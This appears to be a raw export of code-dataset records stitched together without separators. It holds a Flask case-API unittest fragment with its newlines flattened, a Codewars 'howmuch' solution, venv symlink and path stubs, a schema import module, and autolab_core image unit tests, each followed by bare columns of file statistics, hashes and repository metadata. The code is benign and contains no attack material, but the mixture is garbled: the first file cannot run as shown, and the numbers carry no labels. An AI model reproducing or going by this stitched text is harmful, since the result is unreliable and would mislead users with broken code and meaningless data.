mock_db_query.filter_by.return_value.all.return_value = [case2, case3] response = self.app.get('/v1/cases?title_number=ZQV888860', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_004_get_cases_for_status(self, mock_db_query): """Gets a list of all cases with the status.""" mock_db_query.filter_by.return_value.all.return_value = [case1, case2] response = self.app.get('/v1/cases?status=active', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_004_get_cases_for_status_and_title_number(self, mock_db_query): """Gets a list of all cases with the status.""" mock_db_query.filter_by.return_value.filter_by.return_value.all.return_value = [case2] response = self.app.get('/v1/cases?status=active&title_number=ZQV888860', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 1) @mock.patch.object(db.Model, 'query') def test_005_get_case(self, mock_db_query): """Gets a specified case.""" mock_db_query.get.return_value = case1 response = self.app.get('/v1/cases/' + case1.case_reference, headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(response.json['case_reference'], 'ABCD123') @mock.patch.object(db.Model, 'query') def test_006_get_case_invalid_case_ref(self, mock_db_query): """The given case reference does not exist.""" mock_db_query.get.return_value = None response = self.app.get('/v1/cases/N0-1D', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 404) self.assertIn('Case not found', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_007_create_case(self, mock_db_query, mock_db_add, mock_db_commit): """Creates a case.""" mock_db_query.get.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] response = self.app.post('/v1/cases', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 201) self.assertEqual(response.json['status'], 'active') # Check we call the correct two database methods self.assertTrue(mock_db_add.called) self.assertTrue(mock_db_commit.called) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_title_number') def test_010_create_case_title_number_already_exists(self, mock_case_set_title_number, mock_db_query, mock_db_add, mock_db_commit): """The given title number already exists for an active case.""" mock_db_query.filter_by.return_value.first.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] mock_case_set_title_number.side_effect = ConflictError('An active case with this title number already exists') response = self.app.post('/v1/cases', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) 
self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_create_case_invalid_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.filter_by.return_value.first.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] mock_case_set_status.side_effect = ValueError('Status is invalid') local_standard_dict = copy.deepcopy(standard_dict) local_standard_dict['status'] = 'invalid status here' response = self.app.post('/v1/cases', data=json.dumps(local_standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 400) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertTrue( 'Status is invalid' in response.json['error_message'] or 'is not one of' in response.json['error_message'] ) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_create_case_title_number_already_exists_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.filter_by.return_value.first.side_effect = [ case1.assigned_staff, case1.client, case1.counterparty, case1.counterparty_conveyancer_contact ] mock_case_set_status.side_effect = ConflictError('An active case with this title number already exists') response = self.app.post('/v1/cases', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) # @mock.patch.object(db.session, 'commit') # @mock.patch.object(db.session, 'add') # @mock.patch.object(db.Model, 'query') # def test_008_create_case_invalid_json(self, mock_db_query, mock_db_add, mock_db_commit): # """The json data used to create the case is invalid.""" # local_standard_dict = copy.deepcopy(standard_dict) # del local_standard_dict['title_number'] # response = self.app.post('/v1/cases', data=json.dumps(local_standard_dict), # headers={'accept': 'application/json', 'content-type': 'application/json'}) # print(response.get_data().decode()) # self.assertEqual(response.status_code, 400) # self.assertIn('"error_message":"\'case_reference\' is a required property', response.json['error_message']) # # check we haven't tried calling the postgres database # self.assertFalse(mock_db_query.called) # # Check we do not call the any database methods # self.assertFalse(mock_db_add.called) # self.assertFalse(mock_db_commit.called) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_009_update_case(self, 
mock_db_query, mock_db_add, mock_db_commit): """Updates the details of a case.""" mock_db_query.get.side_effect = [ case1, case1.address ] response = self.app.put('/v1/cases/' + standard_dict['case_reference'], data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) # Check we call the correct two database methods self.assertTrue(mock_db_add.called) self.assertTrue(mock_db_commit.called) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_010_update_case_invalid_case_ref(self, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.get.side_effect = [ None, case1.address ] response = self.app.put('/v1/cases/N0-1D', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 404) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('Case not found', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_011_update_case_mismatch_case_ref(self, mock_db_query, mock_db_add, mock_db_commit): """The case reference in the url does not match the case reference in the request body.""" mock_db_query.get.side_effect = [ case1, case1.address ] response = self.app.put('/v1/cases/WR0NG-1D', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 400) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('Case Reference mismatch', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_title_number') def test_010_update_case_title_number_already_exists(self, mock_case_set_title_number, mock_db_query, mock_db_add, mock_db_commit): """The given title number already exists for an active case.""" mock_db_query.get.side_effect = [ case1, case1.address ] mock_case_set_title_number.side_effect = ConflictError('An active case with this title number already exists') response = self.app.put('/v1/cases/' + standard_dict['case_reference'], data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_update_case_invalid_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.get.side_effect = [ case1, case1.address ] mock_case_set_status.side_effect = ValueError('Status is invalid') local_standard_dict = copy.deepcopy(standard_dict) 
local_standard_dict['status'] = 'invalid status here' response = self.app.put('/v1/cases/' + local_standard_dict['case_reference'], data=json.dumps(local_standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 400) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertTrue( 'Status is invalid' in response.json['error_message'] or 'is not one of' in response.json['error_message'] ) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_update_case_title_number_already_exists_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.get.side_effect = [ case1, case1.address ] mock_case_set_status.side_effect = ConflictError('An active case with this title number already exists') response = self.app.put('/v1/cases/' + standard_dict['case_reference'], data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) # @mock.patch.object(db.session, 'commit') # @mock.patch.object(db.session, 'add') # @mock.patch.object(db.Model, 'query') # def test_012_update_case_invalid_json(self, mock_db_query, mock_db_add, mock_db_commit): # """The json data used to update the case is invalid.""" # local_standard_dict = copy.deepcopy(standard_dict) # del local_standard_dict['title_number'] # response = self.app.put('/v1/cases/' + local_standard_dict['case_reference'], # data=json.dumps(local_standard_dict), # headers={'accept': 'application/json', 'content-type': 'application/json'}) # self.assertEqual(response.status_code, 400) # self.assertIn('"error_message":"\'case_reference\' is a required property', response.json['error_message']) # # check we haven't tried calling the postgres database # self.assertFalse(mock_db_query.called) # # Check we do not call the any database methods # self.assertFalse(mock_db_add.called) # self.assertFalse(mock_db_commit.called)
44.741379
118
0.623603
2453
20760
5.059111
0.091724
0.041579
0.059226
0.058904
0.861322
0.856648
0.847381
0.842546
0.824738
0.797019
0
0.021917
0.257129
20760
463
119
44.838013
0.782778
0.156647
0
0.647436
0
0
0.173422
0.019116
0
0
0
0
0.169872
1
0.057692
false
0
0.022436
0
0.083333
0.054487
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8fd2e82aebac5ad690a708e50d0e59e898bbc4d9
148
py
Python
6 kyu/How Much.py
mwk0408/codewars_solutions
9b4f502b5f159e68024d494e19a96a226acad5e5
[ "MIT" ]
6
2020-09-03T09:32:25.000Z
2020-12-07T04:10:01.000Z
6 kyu/How Much.py
mwk0408/codewars_solutions
9b4f502b5f159e68024d494e19a96a226acad5e5
[ "MIT" ]
1
2021-12-13T15:30:21.000Z
2021-12-13T15:30:21.000Z
6 kyu/How Much.py
mwk0408/codewars_solutions
9b4f502b5f159e68024d494e19a96a226acad5e5
[ "MIT" ]
null
null
null
def howmuch(m, n):
    return [[f"M: {i}",f"B: {5+i//63*9}" ,f"C: {4+i//63*7}" ] for i in range(min(m,n), max(m, n)+1) if ( i>=37 and (i-37)%63==0)]
74
129
0.47973
39
148
1.820513
0.615385
0.084507
0
0
0
0
0
0
0
0
0
0.129032
0.162162
148
2
129
74
0.443548
0
0
0
0
0
0.228188
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
8fea4bed48fa59ec55fe07f8f6ad1b99d153bbb8
96
py
Python
venv/lib/python3.8/site-packages/cleo/parser.py
Retraces/UkraineBot
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
[ "MIT" ]
2
2022-03-13T01:58:52.000Z
2022-03-31T06:07:54.000Z
venv/lib/python3.8/site-packages/cleo/parser.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
19
2021-11-20T04:09:18.000Z
2022-03-23T15:05:55.000Z
venv/lib/python3.8/site-packages/cleo/parser.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
null
null
null
/home/runner/.cache/pip/pool/7b/7f/96/63a574971b9bef03664f7734b5fe4d077878ca6eb0d0b03b788da826f9
96
96
0.895833
9
96
9.555556
1
0
0
0
0
0
0
0
0
0
0
0.4375
0
96
1
96
96
0.458333
0
0
0
0
0
0
0
0
1
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
1
0
0
0
1
0
0
0
0
0
0
0
0
6
890af031eb6be83b77fc37f7c9187ae08b527b00
340
py
Python
backend/application/schemas/__init__.py
uesleicarvalhoo/Ecommerce
1d8d0f0c522dcd27fd90e315989b6fa93caf62b8
[ "MIT" ]
null
null
null
backend/application/schemas/__init__.py
uesleicarvalhoo/Ecommerce
1d8d0f0c522dcd27fd90e315989b6fa93caf62b8
[ "MIT" ]
null
null
null
backend/application/schemas/__init__.py
uesleicarvalhoo/Ecommerce
1d8d0f0c522dcd27fd90e315989b6fa93caf62b8
[ "MIT" ]
null
null
null
from backend.domain.schemas import Token, TokenData

from .crud import NewClientSchema, NewOrderItemSchema, NewProductSchema, UpdateClientSchema
from .entities import ClientSchema, OrderItemSchema, OrderSchema, PaymentInfoSchema, PaymentResultSchema, ProductSchema
from .query import QueryClientSchema, QueryOrderSchema, QueryProductSchema
56.666667
119
0.870588
29
340
10.206897
0.793103
0
0
0
0
0
0
0
0
0
0
0
0.082353
340
5
120
68
0.948718
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
891141474009e5e3bb5335af572453341185f7e8
94
py
Python
code/misc/__init__.py
niuwk/infonets
274e97c9a86144dd52cbe90caffff578a2f5d178
[ "BSD-3-Clause" ]
8
2018-06-20T23:20:43.000Z
2020-01-12T01:32:06.000Z
code/misc/__init__.py
niuwk/infonets
274e97c9a86144dd52cbe90caffff578a2f5d178
[ "BSD-3-Clause" ]
null
null
null
code/misc/__init__.py
niuwk/infonets
274e97c9a86144dd52cbe90caffff578a2f5d178
[ "BSD-3-Clause" ]
4
2018-06-26T20:28:13.000Z
2021-06-17T13:39:56.000Z
from __future__ import absolute_import, division, print_function

from .predataset import *
15.666667
64
0.819149
11
94
6.454545
0.727273
0
0
0
0
0
0
0
0
0
0
0
0.138298
94
5
65
18.8
0.876543
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0.5
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
1
0
6
8f1621ab1057ac7a0d606f8f58c524319c41c036
1067
py
Python
pyenv/lib/python3.6/weakref.py
ronald-rgr/ai-chatbot-smartguide
c9c830feb6b66c2e362f8fb5d147ef0c4f4a08cf
[ "Apache-2.0" ]
null
null
null
pyenv/lib/python3.6/weakref.py
ronald-rgr/ai-chatbot-smartguide
c9c830feb6b66c2e362f8fb5d147ef0c4f4a08cf
[ "Apache-2.0" ]
3
2020-03-23T18:01:51.000Z
2021-03-19T23:15:15.000Z
pyenv/lib/python3.6/weakref.py
ronald-rgr/ai-chatbot-smartguide
c9c830feb6b66c2e362f8fb5d147ef0c4f4a08cf
[ "Apache-2.0" ]
null
null
null
XSym 0074 be01ab2100c1c1d1fb2b73cffbbd8141 /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/weakref.py
213.4
949
0.095595
15
1067
6.8
0.933333
0
0
0
0
0
0
0
0
0
0
0.210526
0.893158
1067
5
949
213.4
0.684211
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
1
0
1
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
8f444eb6a59441c478006a9a76544b297c438d0a
16740
py
Python
tests/test_image.py
shivamvats/autolab_core
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
[ "Apache-2.0" ]
68
2017-07-02T22:14:47.000Z
2022-03-30T19:09:37.000Z
tests/test_image.py
shivamvats/autolab_core
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
[ "Apache-2.0" ]
14
2017-06-29T18:27:12.000Z
2022-02-02T20:59:02.000Z
tests/test_image.py
shivamvats/autolab_core
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
[ "Apache-2.0" ]
35
2017-07-17T01:44:59.000Z
2022-03-30T19:09:28.000Z
""" Tests the image class. Author: Jeff Mahler """ import os import logging import numpy as np import unittest from .constants import IM_HEIGHT, IM_WIDTH, BINARY_THRESH, COLOR_IM_FILEROOT from autolab_core import ( ColorImage, DepthImage, BinaryImage, SegmentationImage, GrayscaleImage, PointCloudImage, NormalCloudImage, ) class TestImage(unittest.TestCase): def test_color_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 3) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.uint8) caught_bad_channels = False try: im = ColorImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.float32) caught_bad_dtype = False try: im = ColorImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_depth_init(self): # valid data random_valid_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype( np.float32 ) im = DepthImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertEqual(im.type, np.float32) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.float32) caught_bad_channels = False try: im = DepthImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.uint8) caught_bad_dtype = False try: im = DepthImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_binary_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH) ).astype(np.uint8) binary_data = 255 * (random_valid_data > BINARY_THRESH) im = BinaryImage(random_valid_data, threshold=BINARY_THRESH) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertTrue(np.allclose(im.data, binary_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_channels = False try: im = BinaryImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_dtype = False try: im = BinaryImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_grayscale_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH) ).astype(np.uint8) im = GrayscaleImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 5).astype(np.uint8) caught_bad_channels = False try: im = GrayscaleImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_dtype = False try: im = GrayscaleImage(random_data) except ValueError: 
caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_segment_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH) ).astype(np.uint8) im = SegmentationImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_channels = False try: im = SegmentationImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_dtype = False try: im = SegmentationImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_pc_init(self): # valid data random_valid_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype( np.float32 ) im = PointCloudImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 3) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_channels = False try: im = PointCloudImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_dtype = False try: im = PointCloudImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_nc_init(self): # valid data random_valid_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype( np.float32 ) random_valid_data = random_valid_data / np.tile( np.linalg.norm(random_valid_data, axis=2)[:, :, np.newaxis], [1, 1, 3], ) im = NormalCloudImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 3) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_channels = False try: im = NormalCloudImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_dtype = False try: im = NormalCloudImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) # invalid norm random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.float32) caught_bad_norm = False try: im = NormalCloudImage(random_data) except ValueError: caught_bad_norm = True self.assertTrue(caught_bad_norm) def test_resize(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) big_scale = 2.0 big_im = im.resize(big_scale) self.assertEqual(big_im.height, big_scale * IM_HEIGHT) self.assertEqual(big_im.width, big_scale * IM_WIDTH) small_scale = 0.5 small_im = im.resize(small_scale) self.assertEqual(small_im.height, small_scale * IM_HEIGHT) self.assertEqual(small_im.width, small_scale * IM_WIDTH) def test_transform(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) translation = np.array([2, 2]) im_tf = im.transform(translation, 0.0) self.assertTrue(np.allclose(im[0, 0], im_tf[2, 2])) def test_shape_comp(self): 
random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im1 = ColorImage(random_valid_data) random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im2 = ColorImage(random_valid_data) self.assertTrue(im1.is_same_shape(im2)) random_valid_data = ( 255.0 * np.random.rand(2 * IM_HEIGHT, 2 * IM_WIDTH, 3) ).astype(np.uint8) im3 = ColorImage(random_valid_data) self.assertFalse(im1.is_same_shape(im3)) def test_mask_by_ind(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) ind = np.array([[0, 0]]) im2 = im.mask_by_ind(ind) self.assertEqual(np.sum(im2[1, 1]), 0.0) def test_indexing(self, height=50, width=100): color_data = (255 * np.random.rand(height, width, 3)).astype(np.uint8) im = ColorImage(color_data, "a") # test valid indexing on color images i = int(height * np.random.rand()) j = int(width * np.random.rand()) k = int(3 * np.random.rand()) logging.info("Indexing with i=%d, j=%d, k=%d" % (i, j, k)) c_true = color_data[i, j, k] c_read = im[i, j, k] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image ijk indexing failed", ) c_true = color_data[i, j, :] c_read = im[i, j] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image ij indexing failed", ) c_true = color_data[i, :, :] c_read = im[i] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image i indexing failed", ) # test valid slicing on color images i_start = 0 j_start = 0 k_start = 0 i_stop = int(height * np.random.rand()) j_stop = int(width * np.random.rand()) k_stop = int(3 * np.random.rand()) i_step = 1 j_step = 1 k_step = 1 logging.info( "Slicing with i_start=%d, i_stop=%d, i_step=%d, \ j_start=%d, j_stop=%d, j_step=%d, \ k_start=%d, k_stop=%d, k_step=%d" % ( i_start, i_stop, i_step, j_start, j_stop, j_step, k_start, k_stop, k_step, ) ) c_true = color_data[ i_start:i_stop:i_step, j_start:j_stop:j_step, k_start:k_stop:k_step ] c_read = im[ i_start:i_stop:i_step, j_start:j_stop:j_step, k_start:k_stop:k_step ] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image ijk slicing failed", ) # test out of bounds indexing on color image caught_out_of_bounds = False try: c_read = im[-1, j, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, -1, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, j, -1] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[height, j, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, width, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, j, 3] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) # test out of bounds slicing on color image. 
(Python slicing does not # cause out of bound) caught_out_of_bounds = False try: c_read = im[ -1:i_stop:i_step, j_start:j_stop:j_step, k_start:k_stop:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, -1:j_stop:j_step, k_start:k_stop:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, j_start:j_stop:j_step, -1:k_stop:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start : height + 1 : i_step, j_start:j_stop:j_step, k_start:k_stop:k_step, ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, j_start : width + 1 : j_step, k_start:k_stop:k_step, ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, j_start:j_stop:j_step, k_start:4:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) def test_io(self, height=50, width=100): color_data = (255 * np.random.rand(height, width, 3)).astype(np.uint8) im = ColorImage(color_data, "a") file_root = COLOR_IM_FILEROOT if not os.path.exists(os.path.dirname(file_root)): os.makedirs(os.path.dirname(file_root)) # save and load png filename = file_root + ".png" im.save(filename) loaded_im = ColorImage.open(filename) self.assertTrue( np.sum(np.abs(loaded_im.data - im.data)) < 1e-5, msg="ColorImage data changed after load png", ) os.remove(filename) # save and load jpg filename = file_root + ".jpg" im.save(filename) loaded_im = ColorImage.open(filename) os.remove(filename) # save and load npy filename = file_root + ".npy" im.save(filename) loaded_im = ColorImage.open(filename) self.assertTrue( np.sum(np.abs(loaded_im.data - im.data)) < 1e-5, msg="ColorImage data changed after load npy", ) os.remove(filename) # save and load npz filename = file_root + ".npz" im.save(filename) loaded_im = ColorImage.open(filename) self.assertTrue( np.sum(np.abs(loaded_im.data - im.data)) < 1e-5, msg="ColorImage data changed after load npz", ) os.remove(filename) os.rmdir(os.path.dirname(file_root)) if __name__ == "__main__": unittest.main()
32.695313
79
0.590562
2132
16740
4.363508
0.072233
0.041277
0.044932
0.065785
0.820703
0.789208
0.763087
0.756853
0.748791
0.742771
0
0.016882
0.317085
16740
511
80
32.759296
0.796886
0.036858
0
0.638756
0
0
0.016537
0
0
0
0
0
0.169856
1
0.0311
false
0
0.014354
0
0.047847
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
